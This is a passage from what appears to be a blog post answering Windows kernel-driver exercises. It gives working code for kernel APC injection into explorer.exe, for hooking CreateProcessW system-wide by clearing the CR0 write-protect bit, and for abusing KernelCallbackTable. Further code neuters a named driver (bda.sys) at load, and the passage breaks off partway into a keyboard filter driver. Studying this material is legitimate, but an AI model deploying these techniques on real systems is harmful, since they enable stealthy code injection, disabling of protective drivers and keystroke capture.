<span style="font-family: Verdana, sans-serif;">The code of the <i>DriverEntry</i> is almost the same as the one from <i>Method 1</i>, the only difference is that this time the scheduled APC is kernelmode and not </span><span style="font-family: Verdana, sans-serif;">usermode. The different lines of code are the following two:</span></div>
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<pre class="CICodeFormatter"><code class="CICodeFormatter"> PKeInitializeApc(pApc, ethreads, OriginalApcEnvironment, &KernelRoutine, NULL, NULL, KernelMode, NULL);
if(!PKeInsertQueueApc(pApc, baseaddr, p_proc, 0))
</code></pre>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The first one specifies that this is a kernelmode APC, while the second one passes two parameters to the kernel routine. These parameters are the pointer to the usermode shellcode and the pointer to the EPROCESS related to <i>Explorer</i>.</span><br />
<span style="font-family: Verdana, sans-serif;">The kernelmode APC is still targeting <i>Explorer.exe</i> like before. Similarly to the shellcode, it retrieves and walks the list of LDR_DATA_TABLE_ENTRY structures </span><span style="font-family: Verdana, sans-serif;">to locate the imagebase of <i>kernel32.dll</i>. Once found, the routine retrieves the address of the <i>CreateProcessW</i> API from the export table, and proceeds by patching it in </span><span style="font-family: Verdana, sans-serif;">order to jump to the shellcode. I chose <i>CreateProcessW</i> just because it is easy to trigger it on command (e.g. by running a process from explorer's GUI), but the </span><span style="font-family: Verdana, sans-serif;">method applies equally to any other API.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The shellcode has also been slightly modified in that I added the following bytes:</span></div>
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<pre class="CICodeFormatter"><code class="CICodeFormatter"> ...
0xC0, 0x48, 0x81, 0xC4, 0x68, 0x01, 0x00, 0x00, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, // last bytes of previous shellcode, padded with nops
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // myflag dq 0
0x65, 0x48, 0xa1, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov rax,qword ptr gs:[40h] TEB.CliendId.UniqueProcess << entry
0x3d, 0x00, 0x00, 0x00, 0x00, // cmp eax, <pid> (<pid> will be patched with the PID of explorer.exe)
0x75, 0x2d, // jnz Done
0x53, // push rbx
0x48, 0xC7, 0xC0, 0x00, 0x00, 0x00, 0x00, // mov rax, 0
0x48, 0xC7, 0xC3, 0x01, 0x00, 0x00, 0x00, // mov rbx, 1
0xF0, 0x48, 0x0F, 0xB1, 0x1D, 0xce, 0xff, 0xff, 0xff, // lock cmpxchg cs:myflag, rbx
0x5B, // pop rbx
0x75, 0x13, // jnz Done (shellcode is run only once)
// save registers used by the shellcode routine: rax, rcx, r9, r8, rdx
0x41, 0x50, // push r8
0x41, 0x51, // push r9
0x50, // push rax
0x51, // push rcx
0x52, // push rdx
0xE8, 0x5F, 0xFC, 0xFF, 0xFF, // call shellcode (beginning of shellcode)
0x5a, // pop rdx
0x59, // pop rcx
0x58, // pop rax
0x41, 0x59, // pop r9
0x41, 0x58, // pop r8
//Done:
0x48, 0x83, 0xec, 0x68, // sub rsp,68h (first two instructions of CreateProcessW)
0x48, 0x8b, 0x84, 0x24, 0xb8, 0x00, 0x00, 0x00, // mov rax,qword ptr [rsp+0B8h]
0xE9, 0x00, 0x00, 0x00, 0x00 // will be patched in order to jump to the rest of the original API instructions </code></pre>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The JMP in the API entry point will actually transfer the execution to the third line of this block of instructions (the one marked with "entry"). This code begins by </span><span style="font-family: Verdana, sans-serif;">verifying that it is being run inside the Explorer process. It does so by comparing TEB.CliendId.UniqueProcess against a Pid hardcoded in the CMP instruction (fourth </span><span style="font-family: Verdana, sans-serif;">line). The CMP instuction has currently a Pid of zero (notice the four bytes following the 0x3d), but these bytes will be patched by the kernelmode APC routine with </span><span style="font-family: Verdana, sans-serif;">the value of the Pid of the Explorer process. </span><span style="font-family: Verdana, sans-serif;"><br>After this check, the code verifies that it has not been already run by examining the line containing "myflag dq 0". These eight bytes are a quadword that simply stores </span><span style="font-family: Verdana, sans-serif;">0 initially, and which is updated to 1 after the "lock cmpxchg cs:myflag, rbx" is run for the first time.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">If both checks are satisfied, the code saves some registers on the stack, and calls the original code that I have described in the previous method. </span><span style="font-family: Verdana, sans-serif;">When the original shellcode returns, the code restores the registers saved earlier, executes the first two instructions of <i>CreateProcessW</i> and jumps to the third </span><span style="font-family: Verdana, sans-serif;">instruction of the original API. Again, the jump in the last line is followed by zeroed bytes, which means it jumps to the next instruction, but, as we will see later, </span><span style="font-family: Verdana, sans-serif;">the four bytes will be patched with the correct offset that will lead the execution flow right to the third instruction of <i>CreateProcessW</i>.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I had to save two instructions because when patching the API entry point I am writing a long JMP, which takes 5 bytes. The first instruction is only 4 bytes long, thus </span><span style="font-family: Verdana, sans-serif;">the patch ends up overwriting also the first byte of the following instruction. For this reason, the first two instructions must be preserved and executed in order to </span><span style="font-family: Verdana, sans-serif;">restore the original execution flow.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Note that here I hardcoded the first two instructions in the shellcode, because this is a proof-of-concept. To generalize the method it is fundamental to use a mini-disassembler to understand how many instructions are going to be overwritten during the patch (so </span><span style="font-family: Verdana, sans-serif;">that they can be saved in the shellcode itself). Also note that if the very first instructions are relative jumps or calls, they cannot be simply copied, but their </span><span style="font-family: Verdana, sans-serif;">relative offsets must be recalculated.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Finally, here is the code of the KernelRoutine:</span></div>
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<pre class="CICodeFormatter"><code class="CICodeFormatter"> VOID KernelRoutine(struct _KAPC *Apc,
PKNORMAL_ROUTINE *NormalRoutine,
PVOID *NormalContext,
PVOID *SystemArgument1, // address of usermode code
PVOID *SystemArgument2 ) // pEPROCESS
{
NTSTATUS status_code;
UNICODE_STRING apiName;
unsigned __int64 peb, p_ldr, p_LDR_DATA_TABLE_ENTRY, pShellcode;
unsigned __int64 image_base, image_data_directory, export_table, AddressOfNames, AddressOfFunctions;
unsigned __int32 AddressOfNameOrdinals;
unsigned __int64 cr0;
int count = 0;
KIRQL apc_irql, old_irql;
// find CreateProcessW and patch it:
// find the peb from eprocess
peb = ((unsigned __int64 *)SystemArgument2)[0];
peb = ((unsigned __int64*)( ((UCHAR *)peb) + 0x338 ))[0];
// find LDR in the peb
p_ldr = peb + 0x18;
p_ldr = *((unsigned __int64 *)p_ldr);
// find kernel32 in one of the LDR
p_LDR_DATA_TABLE_ENTRY = *((unsigned __int64 *)(p_ldr + 0x10));
while(wcscmp((wchar_t *)(*(unsigned __int64 *)(p_LDR_DATA_TABLE_ENTRY + 0x60)), L"kernel32.dll") != 0)
{
p_LDR_DATA_TABLE_ENTRY = *(unsigned __int64 *)p_LDR_DATA_TABLE_ENTRY;
}
// get kernel32 imagebase
image_base = *(unsigned __int64 *)(p_LDR_DATA_TABLE_ENTRY + 0x30);
// parse export table to find CreateFileA and get the address
// image_base + offset PE_HEADER + offset _IMAGE_NT_HEADERS64._IMAGE_OPTIONAL_HEADER + offset _IMAGE_OPTIONAL_HEADER.DataDirectory[0]
image_data_directory = image_base + *(unsigned __int32*)(image_base +0x3c) + 0x18 + 0x70;
export_table = *((unsigned __int32 *)image_data_directory) + image_base;
AddressOfNames = *((unsigned __int32 *)(export_table + 0x20)) + image_base;
while(strncmp((char *)(*(unsigned __int32*)AddressOfNames) + image_base, "CreateProcessW", sizeof("CreateProcessW")) != 0)
{
AddressOfNames += 4;
count++;
}
AddressOfNameOrdinals = ((unsigned __int16 *)(*((unsigned __int32 *)(export_table + 0x24)) + image_base))[count];
AddressOfFunctions = ((unsigned __int32 *)(*((unsigned __int32 *)(export_table + 0x1c)) + image_base))[AddressOfNameOrdinals] + image_base;
// (copy the first API instructions in the stub, already done)
// patch the stub of the shellcode to make the last jmp point to the third instruction of CreateProcessW (api + 0x0C)
pShellcode = *(unsigned __int64 *)SystemArgument1;
*((unsigned __int32 *)&((char *)pShellcode)[sizeof(buffer)-4]) = (unsigned __int32)(AddressOfFunctions - (unsigned __int64)pShellcode - sizeof(buffer) + 0x0C);
// patch the opcode that compares the current PID with the PID of the target process
*((unsigned __int32 *)&((char *)pShellcode)[sizeof(buffer)-0x45]) = (unsigned __int32)PsGetProcessId(*((PEPROCESS*)SystemArgument2));
_disable();
cr0 = __readcr0();
__writecr0(cr0 & 0xfffeffff);
// patch the API address to jmp to the stub, this patch will be visible to all processes
// since removing the Write-Protect flag also disables the Copy-On-Write
((char *)AddressOfFunctions)[0] = 0xe9;
*(unsigned __int32 *)(AddressOfFunctions + 1) = 0 - ((unsigned __int32)(AddressOfFunctions - (unsigned __int64)pShellcode - sizeof(buffer) + 0x56));
__writecr0(cr0);
_enable();
ExFreePool(Apc);
}
</code></pre>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">As anticipated earlier, this routine hooks the <i>CreateProcessW</i> API by overwriting its first opcodes with a JMP to the shellcode (specifically, to its offset marked with the "Entry" comment) and by patching some of its opcodes with parameters that are available only at run-time. In particular, these parameters are: the address of the third instruction of CreateFileW and the the PID of the target process.<br>
There is still one interesting detail that we haven't discussed yet. In order to perform the hook, the KernelRoutine disables the <i>WriteProtect </i>flag from the <i>CR0</i> register, which allows the code to write on any present memory page, even if it is marked as read only. However, </span><span style="font-family: Verdana, sans-serif;">this has also the side effect of disabling the <i>copy-on-write</i>, and we will see how this is going to be addressed.</span><br />
<span style="font-family: Verdana, sans-serif;">Normally, a physical memory </span><span style="font-family: Verdana, sans-serif;">page of code from a system DLL is shared among all processes' virtual memory. If a process decides to patch such code (e.g. an API), the OS would detect</span><span style="font-family: Verdana, sans-serif;"> the write attempt and would allocate a dedicated physical memory page to the patching process so that it would remain localized </span><span style="font-family: Verdana, sans-serif;">and would not affect the other processes. However, if the <i>WriteProtect</i> is disabled, the OS will not react to the write attempt and thus will not </span><span style="font-family: Verdana, sans-serif;">allocate a dedicated physical page for the patch. This means that the patch is effectively operating on all the running processes, but not all of them have a </span><span style="font-family: Verdana, sans-serif;">shellcode to jump to. Therefore, to prevent crashing them, the shellcode needs to verify that the current Pid is indeed the one of Explorer.</span><br />
<span style="font-family: Verdana, sans-serif;"><u><i>Note</i></u>: </span><span style="font-family: Verdana, sans-serif;">in cases in which the kernel routine needs to modify sensitive areas of memory, </span><span style="font-family: Verdana, sans-serif;">some extra care is generally required. For example, it may be necessary to: </span><span style="font-family: Verdana, sans-serif;">disable the interrupts (possibly on all the CPUs by scheduling a DPC); use atomic operations; use proper synchronization. In my case, the driver was tested on a machine with a single CPU, therefore once the interrupts are disabled with _disable(), it is pretty safe to patch the code and disable the <i>WriteProtect</i> without atomic operations or synchronization.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<span style="font-family: Verdana, sans-serif;"><u><b>Method 3</b></u></span><br />
<ul>
</ul>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I tried to work on a third method, which proved to be unstable and therefore cannot be used, however I think it deserves some attention. </span><span style="font-family: Verdana, sans-serif;">This method tries to harness the kernelmode API <i>KeUserModeCallback</i> in order to run code in usermode.</span><br />
<span style="font-family: Verdana, sans-serif;">The OS maintains a table of usermode callback routines, which is located in </span><span style="font-family: Verdana, sans-serif;">usermode and is pointed by <i>PEB.KernelCallbackTable</i>. In particular, these callbacks can be called from kernelmode with the API <i>KeUserModeCallback, </i>that </span><span style="font-family: Verdana, sans-serif;">takes in input the index of the desired function within the table. Thus, by inserting a pointer to the shellcode inside this table, I can manage to </span><span style="font-family: Verdana, sans-serif;">call it from kernelmode and have it executed in usermode.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The code encompasses some changes. A first difference is at the end of the shellcode:</span></div>
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<pre class="CICodeFormatter"><code class="CICodeFormatter"> ...
0xC0, 0x48, 0x81, 0xC4, 0x68, 0x01, 0x00, 0x00, 0xcd, 0x2b, 0xc3 </code></pre>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">which ends with an "int 2b" (0xcd 0x2b) and a "ret" (0xC3).<b> </b>We will see later why.</span></div>
<br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Another modification occurs in the <i>DriverEntry</i>, when the KAPC structure is initialized:</span></div>
<pre class="CICodeFormatter"><code class="CICodeFormatter">
PKeInitializeApc(pApc, ethreads, OriginalApcEnvironment, &KernelRoutine, NULL, (PKNORMAL_ROUTINE)(baseaddr + 0x35A), UserMode, NULL);
if(!PKeInsertQueueApc(pApc, baseaddr, p_proc, 0))
</code></pre>
<br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">The code uses again a dummy normal routine: in fact, the "baseaddr + 0x35a" parameter refers to the last byte of the shellcode (the RET). </span><span style="font-family: Verdana, sans-serif;">If a normal routine is not provided, the system seems to crash. </span></span></div>
<br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Finally, the <i>KernelRoutine</i> is the one that changes significantly and does the actual job of overwriting an entry in the <i>KernelCallbackTable </i>:</span></div>
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<pre class="CICodeFormatter"><code class="CICodeFormatter"> VOID KernelRoutine(struct _KAPC *Apc,
PKNORMAL_ROUTINE *NormalRoutine,
PVOID *NormalContext,
PVOID *SystemArgument1, // address of usermode code
PVOID *SystemArgument2 ) // pEPROCESS
{
NTSTATUS status_code;
UNICODE_STRING apiName;
NTSTATUS (*pKeUserModeCallback)(ULONG apiNumber, void* inputBuffer, ULONG inputLength, void** outputBuffer, ULONG* outputLength);
unsigned __int64 peb, callback_table;
unsigned __int64 cr0;
KIRQL apc_irql, old_irql;
DbgPrint("APC kernel routine\n");
RtlInitUnicodeString(&apiName, L"KeUserModeCallback");
pKeUserModeCallback = MmGetSystemRoutineAddress(&apiName);
if(pKeUserModeCallback == NULL)
{
DbgPrint("Cannot find pKeUserModeCallback\n");
return;
}
DbgPrint("Usermode address: %016x \n", SystemArgument1);
// retrieve PEB address
peb = ((unsigned __int64 *)SystemArgument2)[0];
peb = ((unsigned __int64*)( ((UCHAR *)peb) + 0x338 ))[0];
// retrieve kernel callback table
callback_table = ((unsigned __int64*)(((UCHAR *)peb) + 0x58))[0] ;
// insert shellcode address into an empty function slot (slot n 0x76, 0x76*8 = 3b0)
callback_table += 0x3b0;
_disable();
cr0 = __readcr0();
__writecr0(cr0 & 0xfffeffff);
((unsigned __int64*)callback_table)[0] = (unsigned __int64)((unsigned __int64 *)SystemArgument1)[0];
__writecr0(cr0);
_enable();
// call it, but first... be careful:
// usermode callbacks can only run at PASSIVE, or else bugcheck IRQL_GT_ZERO_AT_SYSTEM_SERVICE
apc_irql = KeGetCurrentIrql();
KeLowerIrql(PASSIVE_LEVEL);
status_code = pKeUserModeCallback(0x76, 0, 0, 0, 0);
KeRaiseIrql(apc_irql, &old_irql);
// ** from user mode to terminate do xor ecx, ecx / xor edx, edx / int 2b (see shellcode) **
ExFreePool(Apc);
}
</code></pre>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span><span style="font-family: Verdana, sans-serif;">I chose to overwrite the table entry at index 0x76 because in my system it was always zero, but it would be preferable to </span><span style="font-family: Verdana, sans-serif;">have a more generic approach to find an empty entry. Once the table entry is written with the pointer to the shellcode, the driver lowers the IRQL to <i>PASSIVE_LEVEL</i> (it will be restored later) and issues a call to <i>KeUserModeCallback</i> </span><span style="font-family: Verdana, sans-serif;">with 0x76 as index. The routine gets executed (Notepad starts successfully) and when the usermode code has finished its task, it returns back to the kernel by issuing </span><span style="font-family: Verdana, sans-serif;">an <i>int 2b</i>. Unfortunately, when the routine ends, it crashes. I made some tests and experiments, trying to figure out if it was a problem related to the stack, but I always </span><span style="font-family: Verdana, sans-serif;">ended up with a crash (a usermode one, not BSOD). In the end, I did not proceed in further investigating this issue, but I believe that it should be possible to make </span><span style="font-family: Verdana, sans-serif;">this method stable and reliable.</span></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><b>4)</b></span><br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">To protect a shared memory resource (allocated in nonpaged memory) in a SMP environment I would use a spinlock: the routines responsible to access the resource would need to acquire the spinlock in order to read or write the data. </span><br />
<span style="font-family: Verdana, sans-serif;">Before acquiring a spinlock, the system raises the IRQL at Dispatch level so that other threads cannot preempt the CPU, then it attempts to obtain the ownership of the spinlock by continuously checking its availability in a loop (that is, <i>spinning</i>). </span><span style="font-family: Verdana, sans-serif;">This mechanism ensures that only one thread from one </span><span style="font-family: Verdana, sans-serif;">CPU at a time is accessing the shared data and it is quite efficient, assuming that the lock is not being held for a long time.</span><br />
<br /></div>
<span style="font-family: Verdana, sans-serif;"><b>5)</b></span><br />
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<pre class="CICodeFormatter"><code class="CICodeFormatter"> #include <Ntifs.h>
#include <string.h>
#define WORD UINT16
#define DWORD UINT32
#define BYTE UINT8
typedef struct _IMAGE_DOS_HEADER
{
WORD e_magic;
WORD e_cblp;
WORD e_cp;
WORD e_crlc;
WORD e_cparhdr;
WORD e_minalloc;
WORD e_maxalloc;
WORD e_ss;
WORD e_sp;
WORD e_csum;
WORD e_ip;
WORD e_cs;
WORD e_lfarlc;
WORD e_ovno;
WORD e_res[4];
WORD e_oemid;
WORD e_oeminfo;
WORD e_res2[10];
LONG e_lfanew;
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;
typedef struct _IMAGE_FILE_HEADER {
WORD Machine;
WORD NumberOfSections;
DWORD TimeDateStamp;
DWORD PointerToSymbolTable;
DWORD NumberOfSymbols;
WORD SizeOfOptionalHeader;
WORD Characteristics;
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;
typedef struct _IMAGE_DATA_DIRECTORY {
DWORD VirtualAddress;
DWORD Size;
} IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;
#define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16
typedef struct _IMAGE_OPTIONAL_HEADER64 {
WORD Magic; /* 0x20b */
BYTE MajorLinkerVersion;
BYTE MinorLinkerVersion;
DWORD SizeOfCode;
DWORD SizeOfInitializedData;
DWORD SizeOfUninitializedData;
DWORD AddressOfEntryPoint;
DWORD BaseOfCode;
ULONGLONG ImageBase;
DWORD SectionAlignment;
DWORD FileAlignment;
WORD MajorOperatingSystemVersion;
WORD MinorOperatingSystemVersion;
WORD MajorImageVersion;
WORD MinorImageVersion;
WORD MajorSubsystemVersion;
WORD MinorSubsystemVersion;
DWORD Win32VersionValue;
DWORD SizeOfImage;
DWORD SizeOfHeaders;
DWORD CheckSum;
WORD Subsystem;
WORD DllCharacteristics;
ULONGLONG SizeOfStackReserve;
ULONGLONG SizeOfStackCommit;
ULONGLONG SizeOfHeapReserve;
ULONGLONG SizeOfHeapCommit;
DWORD LoaderFlags;
DWORD NumberOfRvaAndSizes;
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64;
typedef struct _IMAGE_NT_HEADERS64 {
DWORD Signature;
IMAGE_FILE_HEADER FileHeader;
IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;
DRIVER_INITIALIZE DriverEntry;
#ifdef ALLOC_PRAGMA
#pragma alloc_text( INIT, DriverEntry )
#endif
VOID
(load_img)(
PUNICODE_STRING FullImageName,
HANDLE ProcessId,
PIMAGE_INFO ImageInfo
)
{
WCHAR *drivername;
UNICODE_STRING servicename;
NTSTATUS unload;
PIMAGE_DOS_HEADER MZ;
PIMAGE_NT_HEADERS64 PE;
UINT8 * entry_point;
unsigned __int64 cr0;
char patch[] = {0xb8, 0x01, 0x00, 0x00, 0xc0, 0xc3};
if(!(ImageInfo->SystemModeImage))
{
// ignore usermode images
return;
}
if(FullImageName->Length >= 8*sizeof(WCHAR))
{
drivername = FullImageName->Buffer + (FullImageName->Length/sizeof(WCHAR)) - 8;
if(wcsncmp(drivername, L"\\bda.sys", 8) == 0)
{
DbgPrint("bda.sys diver detected! imagebase %p \n", (UINT8*)ImageInfo->ImageBase);
MZ = (IMAGE_DOS_HEADER *) ImageInfo->ImageBase;
PE = (PIMAGE_NT_HEADERS64) ( ((UINT8*)ImageInfo->ImageBase) + MZ->e_lfanew);
entry_point = PE->OptionalHeader.AddressOfEntryPoint + (UINT8*)ImageInfo->ImageBase;
_disable();
cr0 = __readcr0();
__writecr0(cr0 & 0xfffeffff);
//patch:
// b8 01 00 00 c0 mov eax, 0xc0000001
// c3 ret
memcpy(entry_point , &patch, sizeof(patch));
__writecr0(cr0);
_enable();
}
}
}
VOID MyUnload(__in PDRIVER_OBJECT DriverObject)
{
PsRemoveLoadImageNotifyRoutine(&load_img);
}
NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
DriverObject->DriverUnload = &MyUnload;
PsSetLoadImageNotifyRoutine(&load_img);
return STATUS_SUCCESS;
}
</code></pre>
<br>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The driver installs a load image notify routine via <i>PsSetImageNotifyRoutine</i>. This routine verifies if the name of the loaded image is <i>bda.sys</i>, and if it is, it patches its entry point with assembly instructions equivalent to:</span></div>
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<pre class="CICodeFormatter"><code class="CICodeFormatter"> return STATUS_UNSUCCESSFUL;
</code></pre>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The load image notify routine is called after the driver is mapped in memory, but before its entry point is executed. Thus, patching the entry point with the above code will cause the driver to report a failure in loading and the OS will unload <i>bda.sys</i> from memory without executing any other code from it. <br>
Finally, when the driver is unloaded, the callback to the load image notify routine is removed via <i>PsRemoveLoadImageNotifyRoutine</i>.
</span></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><b>6)</b></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">sioctl.h:</span>
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<pre class="CICodeFormatter" ><code class="CICodeFormatter"> #include <ntddkbd.h>
typedef struct _DEVICE_EXTENSION
{
PDEVICE_OBJECT pTargetDevice;
} DEVICE_EXTENSION, *PDEVICE_EXTENSION;
</code></pre>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">sioctl.c:</span>
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<br />
<pre class="CICodeFormatter"><code class="CICodeFormatter"> #include <ntddk.h>
#include <string.h>
#include "sioctl.h"
#define WORD UINT16
#define DWORD UINT32
#define BYTE UINT8
DRIVER_INITIALIZE DriverEntry;
#ifdef ALLOC_PRAGMA
#pragma alloc_text( INIT, DriverEntry )
#endif
PDEVICE_OBJECT kbd_class_dev = NULL;
PDEVICE_OBJECT my_keyboard_dev = NULL;
// scan codes taken from http://www.win.tue.nl/~aeb/linux/kbd/scancodes-10.html (column Set 1)
#define SCAN_MAPPINGS 0x3b
unsigned char* scan_code_mapping[SCAN_MAPPINGS] = {
"<unk>", "<unk>", "1 or !", "2 or @", "3 or #", "4 or $", "5 or %", "6 or ^", "7 or &", "8 or *", "9 or (", "0 or )",
